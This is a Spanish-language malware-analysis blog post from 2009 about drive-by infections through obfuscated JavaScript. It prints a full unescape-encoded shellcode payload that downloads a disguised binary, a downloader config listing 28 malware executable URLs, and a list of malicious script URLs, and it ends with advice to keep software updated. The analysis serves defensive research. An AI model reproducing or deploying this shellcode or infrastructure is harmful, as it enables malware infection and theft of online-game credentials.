Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

jueves, 5 de febrero de 2009

Explotación de vulnerabilidades a través de JS

Explotar vulnerabilidades a través de diferentes tipos de formato de archivo se ha convertido en moneda corriente y en un método altamente empleado por los creadores y diseminadores de malware.

Estos métodos, que además son combinados con diferentes estrategias, se convierten en una bomba de tiempo que se detona con la simple acción de acceder a una página maliciosamente manipulada para albergar estas estrategias de ataque.


Numerosos casos como el aprovechamiento de diferentes debilidades explotadas por intermedio de archivos .js, .swf, .pdf, .mp3, incluso, simulando ser archivos .css, ponen en manifiesto que ningún tipo de archivo se encuentra exento a ser utilizado como canal de propagación y mucho menos como vector de infección.


Durante las últimas semanas, una oleada de archivos .js se vienen utilizando para redireccionar la descarga de códigos maliciosos a través de scripts ofuscados que se esconden en el cuerpo mismo del JavaScript; como el siguiente que se aloja en la URL http://www.710sese .cn/a1/realdadong .js y cuyo hash en md5 es d1094b907dfe99784b206d2ae9b1fe97:


var mybr = unescape(%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%
ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70
%u8bad%u0870%uec81%u0200%u0000%uec8b
%ue8bb%u020f%u8b00%u8503%u0fc0%ub
b85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe
98%u0e8a%ub1e8
%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1
%ub8e5%u95e8%u0000%u8900"+"%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8
900%u1045%u6856%ufcaa
%u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469
%u6be8%u0000%u8900%u1445%ue0bb%u020f%
u8900%u3303%uc7f6%u2845%u5255%u4
d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455%u6850%u1a3
6%u702f%u3fe8%u
0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e%uc778%u0
544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%
ue80c%u0062%u0000%
uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b
53%u087d%u5d8b%u560c%u738b%u8b3c%u1
e74%u0378%u56f3%u768b%u0320%u33f3%u
49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1%
u030d%u40f2%uf1eb%uf
e3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u04
8b%u
038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000%ua4f3%
uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u044
7%u006c%u0000%uff57%u0455%u458
9%uc724%u5207%u6c74%uc741%u0447%u6c6c%u63
6f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u
5057%u55ff%u8b08%ub8f0%u0fe
4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff%
u8b04%u3c
48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff5
6%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u0
48b%u5324%u5251%u5756%uec
b9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u
06e8%ub70f%u8118%ufffb%u0015%u7500%u833e%
u06e8%ub70f%u8118%ufffb%u0035%u75
00%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083%u8b04%ub830
%u0fe0%u0002%u
0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff0
0%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u
2f3a%u642f%u772e%u6965
%u6b78%u632e%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0
073);


La cuestión es que, entre las líneas de este script ofuscado, se ejecuta la descarga de un archivo binario, desde una URL diferente, llamado a1.css que aparenta ser un .css (Cascading Style Sheets – Hoja de estilo en cascada). Este binario es un malware.



Además, entre medio de todo el proceso de infección, que dura tan solo unos pocos segundos, establece conexión contra los sitios txt.hsdee .com y www.wdswe .com, donde, desde el primero hace un Drive-by Update en el archivo oo.txt para, cuando este responde con un 200 "OK", descargar los binarios establecidos en dicho archivo. El primero de ellos desde http://www.wdswe .com/new/new1 .exe (md5: 1c0b699171f985b1eab092bf83f2ad37).

La información que se lee en el archivo de texto es la siguiente:

[file]
open=y

url1=http://www.wdswe .com/new/new1 .exe

url2=http://www.wdswe .com/new/new2 .exe

url3=http://www.wdswe .com/new/new3 .exe

url4=http://www.wdswe .com/new/new4 .exe

url5=http://www.wdswe .com/new/new5 .exe

url6=http://www.wdswe .com/new/new6 .exe

url7=http://www.wdswe .com/new/new7 .exe

url8=http://www.wdswe .com/new/new8 .exe

url9=http://www.wdswe .com/new/new9 .exe

url10=http://www.wdswe .com/new/new10 .exe

url11=http://www.wdswe .com/new/new11 .exe

url12=http://www.wdswe .com/new/new12 .exe

url13=http://www.wdswe .com/new/new13 .exe

url14=http://www.wdswe .com/new/new14 .exe

url15=http://www.wdswe .com/new/new15 .exe

url16=http://www1.wdswe .com/new/new16 .exe

url17=http://www1.wdswe .com/new/new17 .exe

url18=http://www1.wdswe .com/new/new18 .exe

url19=http://www1.wdswe .com/new/new19 .exe

url20=http://www1.wdswe .com/new/new20 .exe

url21=http://www1.wdswe .com/new/new21 .exe

url22=http://www1.wdswe .com/new/new22 .exe

url23=http://www1.wdswe .com/new/new23 .exe

url24=http://www1.wdswe .com/new/new24 .exe

url25=http://www1.wdswe .com/new/new25 .exe

url26=http://www1.wdswe .com/new/new26 .exe

url27=http://www1.wdswe .com/new/new27 .exe

url28=http://www1.wdswe .com/new/new28 .exe

count=28


De esta manera se produce la infección con varios códigos maliciosos, la mayoría de ellos diseñados para robar credenciales de autenticación a juegos en línea como WoW.


Algunas otras URL’s utilizadas para propagar malware de la misma manera son:

http://97.haowyt .com/js/baidu .js

http://97.haowyt .com/js/baidu .js

http://www.163wyt .com/js/yahoo .js

http://www.710sese .cn/a1/hohogl .js

http://www.710sese .cn/a1/wokaono .js

http://www.710sese .cn/a1/woriniss .js

http://qq.18i16 .net/lzz .js

http://qq.18i16 .net/bf .js

http://qq.18i16 .net/realplay .js

http://qq.18i16 .net/new .js

http://qq.18i16 .net/cx .js

http://www.baomaaa .cn/a1/realdadong .js
http://www.baomaaa .cn/a1/hohogl .js
http://www.baomaaa .cn/a1/wokaono .js

http://www.baomaaa .cn/a1/woriniss .js

http://tj.gan7788 .com/js/js .js

http://sss.2010wyt .net/r .js

http://sss.2010wyt .net/614 .js


A pesar del empleo, por parte de los creadores de malware, de avanzadas técnicas de infección, existe un elemento fundamental que puede evitar ser víctimas de ataques similares enfocado netamente en mantener las actualizaciones completamente al día, incluidas las aplicaciones.

Información relacionada:
Drive-by Update para propagación de malware
Explotación masiva de vulnerabilidades a través de servidores fantasmas

Nueva estrategia de IS para diseminar scareware
Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs
Análisis esquemáticos de un ataque de malware basado en web


# pistus

Ver más